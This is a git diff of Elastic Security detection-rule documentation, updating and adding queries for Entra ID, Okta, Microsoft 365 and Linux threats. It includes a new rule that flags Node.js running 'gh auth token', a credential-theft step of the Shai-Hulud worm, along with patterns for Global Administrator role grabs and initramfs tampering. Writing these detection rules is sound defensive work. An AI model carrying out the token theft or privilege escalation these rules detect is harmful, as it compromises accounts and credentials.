+ +*Rule type*: query + +*Rule indices*: + +* filebeat-* +* logs-azure.auditlogs-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://securitylabs.datadoghq.com/articles/i-spy-escalating-to-entra-id-global-admin/ +* https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator +* https://www.microsoft.com/en-us/security/blog/2025/08/27/storm-0501s-evolving-techniques-lead-to-cloud-based-ransomware/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Tactic: Persistence +* Resources: Investigation Guide + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Entra ID Global Administrator Role Assigned* + + +Microsoft Entra ID's Global Administrator role grants comprehensive access to manage Microsoft Entra ID and associated services. Adversaries may exploit this by assigning themselves or others to this role, ensuring persistent control over resources. The detection rule identifies such unauthorized assignments by monitoring specific audit logs for role changes, focusing on the addition of members to the Global Administrator role, thus helping to mitigate potential security breaches. + + +*Possible investigation steps* + + +- Review the Microsoft Entra ID audit logs to identify the user account that performed the "Add member to role" operation, focusing on the specific event dataset and operation name. +- Verify the identity of the user added to the Global Administrator role by examining the modified properties in the audit logs, specifically the new_value field indicating "Global Administrator". +- Check the history of role assignments for the identified user to determine if this is a recurring pattern or a one-time event. +- Investigate the source IP address and location associated with the role assignment event to assess if it aligns with expected user behavior or if it indicates potential unauthorized access. +- Review any recent changes or activities performed by the newly assigned Global Administrator to identify any suspicious actions or configurations that may have been altered. +- Consult with the organization's IT or security team to confirm if the role assignment was authorized and aligns with current administrative needs or projects. +- Correlate with Microsoft Entra ID sign-in logs to check for any unusual login patterns or failed login attempts associated with the user who assigned the role. +- Review the reported device to determine if it is a known and trusted device or if it raises any security concerns such as unexpected relationships with the source user. + + +*False positive analysis* + + +- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role temporarily for maintenance or configuration purposes. To manage this, create exceptions for known IT personnel or scheduled maintenance windows. +- Automated scripts or third-party applications that require elevated permissions might be flagged if they are configured to add users to the Global Administrator role. 
Review and whitelist these scripts or applications if they are verified as safe and necessary for operations. +- Organizational changes, such as mergers or restructuring, can lead to legitimate role assignments that appear suspicious. Implement a review process to verify these changes and exclude them from triggering alerts if they align with documented organizational changes. +- Training or onboarding sessions for new IT staff might involve temporary assignment to the Global Administrator role. Establish a protocol to document and exclude these training-related assignments from detection alerts. + + +*Response and remediation* + + +- Immediately remove any unauthorized users from the Global Administrator role to prevent further unauthorized access and control over Azure AD resources. +- Conduct a thorough review of recent audit logs to identify any additional unauthorized changes or suspicious activities associated with the compromised account or role assignments. +- Reset the credentials of the affected accounts and enforce multi-factor authentication (MFA) to enhance security and prevent further unauthorized access. +- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation. +- Implement conditional access policies to restrict Global Administrator role assignments to specific, trusted locations or devices. +- Review and update role assignment policies to ensure that only a limited number of trusted personnel have the ability to assign Global Administrator roles. +- Enhance monitoring and alerting mechanisms to detect similar unauthorized role assignments in the future, ensuring timely response to potential threats. + + +==== Rule query + + +[source, js] +---------------------------------- +event.dataset:azure.auditlogs and + azure.auditlogs.properties.category:RoleManagement and + azure.auditlogs.operation_name:"Add member to role" and + azure.auditlogs.properties.target_resources.*.modified_properties.*.new_value: "\"Global Administrator\"" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc index d37ba4803a..56e4358f08 100644 --- a/docs/detections/prebuilt-rules/rule-details/entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-rt-to-prt-transition-from-same-user-and-device.asciidoc @@ -37,7 +37,7 @@ Identifies when a user signs in with a refresh token using the Microsoft Authent * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -135,6 +135,14 @@ sequence by azure.signinlogs.properties.user_id, azure.signinlogs.properties.dev ** ID: T1098.005 ** Reference URL: https://attack.mitre.org/techniques/T1098/005/ * Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** 
Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: ** Name: Initial Access ** ID: TA0001 ** Reference URL: https://attack.mitre.org/tactics/TA0001/ diff --git a/docs/detections/prebuilt-rules/rule-details/excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc b/docs/detections/prebuilt-rules/rule-details/excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc index da67390214..0284e86277 100644 --- a/docs/detections/prebuilt-rules/rule-details/excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/excessive-secret-or-key-retrieval-from-azure-key-vault.asciidoc @@ -34,7 +34,7 @@ Identifies excessive secret or key retrieval operations from Azure Key Vault. Th * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -138,7 +138,6 @@ from logs-azure.platformlogs-* metadata _id, _index Esql_priv.azure_platformlogs_identity_claim_upn_values = values(azure.platformlogs.identity.claim.upn), Esql.azure_platformlogs_identity_claim_upn_count_distinct = count_distinct(azure.platformlogs.identity.claim.upn), Esql.azure_platformlogs_identity_claim_appid_values = values(azure.platformlogs.identity.claim.appid), - Esql.azure_platformlogs_identity_claim_objectid_values = values(azure.platformlogs.identity.claim.objectid), Esql.source_ip_values = values(source.ip), Esql.geo_city_values = values(geo.city_name), @@ -167,7 +166,6 @@ by Esql.time_window_date_trunc, azure.platformlogs.identity.claim.upn Esql_priv.azure_platformlogs_identity_claim_upn_values, Esql.azure_platformlogs_identity_claim_upn_count_distinct, Esql.azure_platformlogs_identity_claim_appid_values, - Esql.azure_platformlogs_identity_claim_objectid_values, Esql.source_ip_values, Esql.geo_city_values, Esql.geo_region_values, diff --git a/docs/detections/prebuilt-rules/rule-details/first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc b/docs/detections/prebuilt-rules/rule-details/first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc index c415c43f34..93424ad98f 100644 --- a/docs/detections/prebuilt-rules/rule-details/first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/first-occurrence-of-entra-id-auth-via-devicecode-protocol.asciidoc @@ -34,10 +34,10 @@ Identifies when a user is observed for the first time in the last 14 days authen * Data Source: Azure * Data Source: Microsoft Entra ID * Use Case: Identity and Access Audit -* Tactic: Credential Access +* Tactic: Initial Access * Resources: Investigation Guide -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -152,10 +152,22 @@ event.dataset:(azure.activitylogs or azure.signinlogs) *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Credential Access -** ID: TA0006 -** Reference URL: https://attack.mitre.org/tactics/TA0006/ +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ * Technique: -** Name: Steal Application Access Token -** ID: T1528 -** Reference URL: https://attack.mitre.org/techniques/T1528/ +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: 
https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/github-authentication-token-access-via-node-js.asciidoc b/docs/detections/prebuilt-rules/rule-details/github-authentication-token-access-via-node-js.asciidoc new file mode 100644 index 0000000000..b0a267bb5a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/github-authentication-token-access-via-node-js.asciidoc @@ -0,0 +1,113 @@ +[[github-authentication-token-access-via-node-js]] +=== GitHub Authentication Token Access via Node.js + +This rule detects when the Node.js runtime spawns a shell to execute the GitHub CLI (gh) command to retrieve a GitHub authentication token. The GitHub CLI is a command-line tool that allows users to interact with GitHub from the terminal. The "gh auth token" command is used to retrieve an authentication token for GitHub, which can be used to authenticate API requests and perform actions on behalf of the user. Adversaries may use this technique to access GitHub repositories and potentially exfiltrate sensitive information or perform malicious actions. This activity was observed in the wild as part of the Shai-Hulud worm. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Discovery +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. 
+For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node" and +process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and process.args == "gh auth token" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Container and Resource Discovery +** ID: T1613 +** Reference URL: https://attack.mitre.org/techniques/T1613/ diff --git a/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc b/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc index 01ef7bdf7e..b33c0f178f 100644 --- a/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-device-token-cookies-generated-for-authentication.asciidoc @@ -34,7 +34,7 @@ Detects when an Okta client address has a certain threshold of Okta user authent * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 206 +*Version*: 207 *Rule authors*: @@ -118,7 +118,7 @@ The Okta Fleet integration, Filebeat module, or similarly structured data is req from logs-okta* | where event.dataset == "okta.system" and - (event.action rlike "user\.authentication(.*)" or event.action == "user.session.start") and + (event.action like "user.authentication.*" or event.action == "user.session.start") and okta.debug_context.debug_data.request_uri == "/api/v1/authn" and okta.outcome.reason == "INVALID_CREDENTIALS" | keep diff --git a/docs/detections/prebuilt-rules/rule-details/initramfs-extraction-via-cpio.asciidoc b/docs/detections/prebuilt-rules/rule-details/initramfs-extraction-via-cpio.asciidoc index a970da1bce..0eb906776a 100644 --- a/docs/detections/prebuilt-rules/rule-details/initramfs-extraction-via-cpio.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/initramfs-extraction-via-cpio.asciidoc @@ -1,7 +1,7 @@ [[initramfs-extraction-via-cpio]] === Initramfs Extraction via CPIO -This rule detects the extraction of an initramfs image using the `cpio` command on Linux systems. The `cpio` command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. 
+This rule detects the extraction of an initramfs image using the "cpio" command on Linux systems. The "cpio" command is used to create or extract cpio archives. Attackers may extract the initramfs image to modify the contents or add malicious files, which can be leveraged to maintain persistence on the system. *Rule type*: eql @@ -39,7 +39,7 @@ This rule detects the extraction of an initramfs image using the `cpio` command * Data Source: SentinelOne * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -136,9 +136,19 @@ For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/ ---------------------------------- process where host.os.type == "linux" and event.type == "start" and event.action in ("exec", "exec_event", "start", "ProcessRollup2", "executed") and -process.name == "cpio" and process.args in ("-H", "--format") and process.args == "newc" and not ( +process.name == "cpio" and process.args in ("-H", "--format") and process.args == "newc" and +not ( process.parent.name in ("mkinitramfs", "dracut") or - process.parent.executable like~ ("/usr/share/initramfs-tools/*", "/nix/store/*") + ?process.parent.executable like~ ("/usr/share/initramfs-tools/*", "/nix/store/*") or + ?process.parent.args in ( + "/bin/dracut", "/usr/share/initramfs-tools/hooks/amd64_microcode", "/usr/bin/dracut", "/usr/sbin/mkinitramfs", + "/usr/sbin/dracut", "/usr/bin/update-microcode-initrd" + ) or + process.args like ("/var/tmp/mkinitramfs_*", "/tmp/tmp.*/mkinitramfs_*") or + ?process.working_directory like ( + "/var/tmp/mkinitramfs-*", "/tmp/microcode-initrd_*", "/var/tmp/mkinitramfs-*", "/var/tmp/dracut.*", + "/var/tmp/mkinitramfs_*" + ) ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kill-command-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/kill-command-execution.asciidoc index 0c32b978fd..4040d5d287 100644 --- a/docs/detections/prebuilt-rules/rule-details/kill-command-execution.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kill-command-execution.asciidoc @@ -30,7 +30,7 @@ This rule detects the execution of kill, pkill, and killall commands on Linux sy * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -128,7 +128,10 @@ For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/ [source, js] ---------------------------------- event.category:process and host.os.type:linux and event.type:start and event.action:exec and -process.name:(kill or pkill or killall) +process.name:(kill or pkill or killall) and not ( + process.args:("-HUP" or "-SIGUSR1" or "-USR2" or "-WINCH" or "-USR1") or + process.parent.command_line:"runc init" +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc b/docs/detections/prebuilt-rules/rule-details/m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc index 67c8055763..456836b0d5 100644 --- a/docs/detections/prebuilt-rules/rule-details/m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/m365-onedrive-excessive-file-downloads-with-oauth-token.asciidoc @@ -11,7 +11,7 @@ Identifies when an excessive number of files are downloaded from OneDrive using *Risk score*: 47 -*Runs every*: 5m +*Runs every*: 8m *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) @@ -33,7 
+33,7 @@ Identifies when an excessive number of files are downloaded from OneDrive using * Tactic: Exfiltration * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc index 277dcfd6af..104fc87be2 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-brute-force-via-entra-id-sign-ins.asciidoc @@ -40,7 +40,7 @@ Identifies potential brute-force attacks targeting Microsoft 365 user accounts b * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -104,7 +104,7 @@ Identifies brute-force authentication activity against Microsoft 365 services us [source, js] ---------------------------------- -from logs-azure.signinlogs* +from logs-azure.signinlogs-* | eval Esql.time_window_date_trunc = date_trunc(15 minutes, @timestamp), diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-policy-deletion.asciidoc index 52e8754e80..be9496724e 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-policy-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-policy-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,10 +30,10 @@ Identifies the deletion of an anti-phishing policy in Microsoft 365. 
By default, * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Configuration Audit -* Tactic: Initial Access +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -108,10 +108,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Phishing -** ID: T1566 -** Reference URL: https://attack.mitre.org/techniques/T1566/ +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-rule-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-rule-modification.asciidoc index 9b56d1aeeb..abc794a1ba 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-rule-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-anti-phish-rule-modification.asciidoc @@ -7,8 +7,8 @@ Identifies the modification of an anti-phishing rule in Microsoft 365. By defaul *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the modification of an anti-phishing rule in Microsoft 365. By defaul *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,10 +30,10 @@ Identifies the modification of an anti-phishing rule in Microsoft 365. 
By defaul * Domain: Cloud * Data Source: Microsoft 365 * Use Case: Configuration Audit -* Tactic: Initial Access +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -108,10 +108,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Phishing -** ID: T1566 -** Reference URL: https://attack.mitre.org/techniques/T1566/ +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc index f0f5a621a3..04a71b1e79 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dkim-signing-configuration-disabled.asciidoc @@ -7,8 +7,8 @@ Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is dis *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is dis *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -28,10 +28,10 @@ Identifies when a DomainKeys Identified Mail (DKIM) signing configuration is dis * Domain: Cloud * Data Source: Microsoft 365 -* Tactic: Persistence +* Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -105,10 +105,14 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Persistence -** ID: TA0003 -** Reference URL: https://attack.mitre.org/tactics/TA0003/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Modify Authentication Process -** ID: T1556 -** Reference URL: https://attack.mitre.org/techniques/T1556/ +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dlp-policy-removed.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dlp-policy-removed.asciidoc index e49a19bef6..95fa80ac57 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dlp-policy-removed.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-dlp-policy-removed.asciidoc @@ -7,8 +7,8 @@ Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. 
*Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies when a Data Loss Prevention (DLP) policy is removed in Microsoft 365. * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-policy-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-policy-deletion.asciidoc index 70a5110571..0ca8ca54b9 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-policy-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-policy-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies when a malware filter policy has been deleted in Microsoft 365. A mal *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a malware filter policy has been deleted in Microsoft 365. A mal *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when a malware filter policy has been deleted in Microsoft 365. A mal * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-rule-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-rule-modification.asciidoc index 93eb2c2508..7eb8f30e44 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-rule-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-malware-filter-rule-modification.asciidoc @@ -7,8 +7,8 @@ Identifies when a malware filter rule has been deleted or disabled in Microsoft *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a malware filter rule has been deleted or disabled in Microsoft *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies when a malware filter rule has been deleted or disabled in Microsoft * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-management-group-role-assignment.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-management-group-role-assignment.asciidoc index 9dda15f5bc..cd79a6a1cb 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-management-group-role-assignment.asciidoc +++ 
b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-management-group-role-assignment.asciidoc @@ -7,8 +7,8 @@ Identifies when a new role is assigned to a management group in Microsoft 365. A *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a new role is assigned to a management group in Microsoft 365. A *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies when a new role is assigned to a management group in Microsoft 365. A * Tactic: Persistence * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -115,3 +115,7 @@ event.dataset:o365.audit and event.provider:Exchange and event.category:web and ** Name: Account Manipulation ** ID: T1098 ** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc index b3d0e1953a..36f642cb86 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-365-exchange-safe-attachment-rule-disabled.asciidoc @@ -7,8 +7,8 @@ Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attach *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: low @@ -16,7 +16,7 @@ Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attach *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when a safe attachment rule is disabled in Microsoft 365. Safe attach * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: 